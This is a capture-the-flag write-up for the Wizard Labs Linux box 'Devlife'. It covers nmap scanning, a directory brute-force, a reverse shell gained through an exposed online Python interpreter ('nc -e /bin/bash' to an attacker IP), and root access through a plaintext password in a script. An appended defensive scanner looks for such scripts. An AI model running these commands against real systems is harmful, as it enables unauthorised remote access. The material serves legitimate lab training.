Hey guys, this is my write-up about Devlife from Wizard Labs, which is their second box to retire. Just like Dummy, it’s another easy box (Difficulty: 2/10). It’s a Linux box and its IP is 10.1.1.20, so let’s jump right in!
We will start with nmap to scan for open ports and services:
nmap -sV -sT -sC 10.1.1.20
Only 2 ports are open: 22 running ssh and 80 running http. Let’s check http.
On the main page we get this “About me” message and nothing else:
/usr/share/wordlists/dirb/common.txt and got these results :
/.htpasswd (Status: 403)
So I checked /dev and found this Online Python 2.7 Interpreter:
Great, now we can get a reverse shell in many ways. I just imported os then did os.system(reverse shell payload):
import os;os.system('nc -e /bin/bash 10.xx.xx.xx 1337')
And we owned user!
/home directory of tedd there is a directory called .env. Let’s check that.
We notice a python script called su.py, which runs su root and uses the password to authenticate:
Now we can su to root using the password
And we owned root !
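A defender-side audit for the su.py finding above, added here as an example and not part of the original write-up: it walks home directories for scripts that invoke su or sudo and carry a password literal, and reports whether group or others can read them. The regex heuristics, the function names and the pexpect-style sample are assumptions, since the page does not reproduce the contents of su.py.

```python
import os
import re
import stat
import tempfile

# Heuristics (assumptions, tune them): the file invokes su/sudo and also holds a
# string literal bound to a password-like name or typed at a prompt.
SU_CALL = re.compile(r"\b(?:su|sudo)\b(?:\s+-\S*)*\s+\w+")
SECRET = re.compile(r"""(?i)(?:\b\w*(?:pass(?:word|wd)?|pwd|secret)\w*\s*=\s*"""
                    r"""|\.(?:sendline|send|write)\(\s*)b?(['"]).+?\1""")
# Constructed stand-in (pexpect-style is an assumption), not the box's su.py.
SAMPLE = ('import pexpect\nc = pexpect.spawn("su root")\nc.expect("Password:")\n'
          'c.sendline("CONSTRUCTED-not-a-real-secret")\n')


def scan_file(path):
    """Return (path, line_no, readable_by_group_or_other); never echoes the literal."""
    try:
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode) or st.st_size > 256 * 1024:
            return []  # skip symlinks, devices and files too big to be a script
        with open(path, "rb") as fh:
            text = fh.read().decode("utf-8", errors="replace")
    except OSError:
        return []  # unreadable: rerun with enough privilege for full coverage
    if "\0" in text or not SU_CALL.search(text):
        return []
    return [(path, n, bool(st.st_mode & 0o044))
            for n, line in enumerate(text.splitlines(), 1) if SECRET.search(line)]


def scan_tree(root):
    """Walk root, hidden directories such as .env included, and collect findings."""
    return [hit for dirpath, _dirs, names in os.walk(root) for name in sorted(names)
            for hit in scan_file(os.path.join(dirpath, name))]


def demo():
    """Build a constructed home tree holding .env/su.py (mode 0644) and scan it."""
    with tempfile.TemporaryDirectory() as home:
        target = os.path.join(home, "tedd", ".env", "su.py")
        os.makedirs(os.path.dirname(target))
        with open(target, "w") as fh:
            fh.write(SAMPLE)
        os.chmod(target, 0o644)
        return [(os.path.relpath(p, home), n, r) for p, n, r in scan_tree(home)]


if __name__ == "__main__":
    print(demo())
```

On a real host, call scan_tree("/home") as root; every hit is a credential to rotate and a script to replace with a scoped sudoers rule or a secrets store.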
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.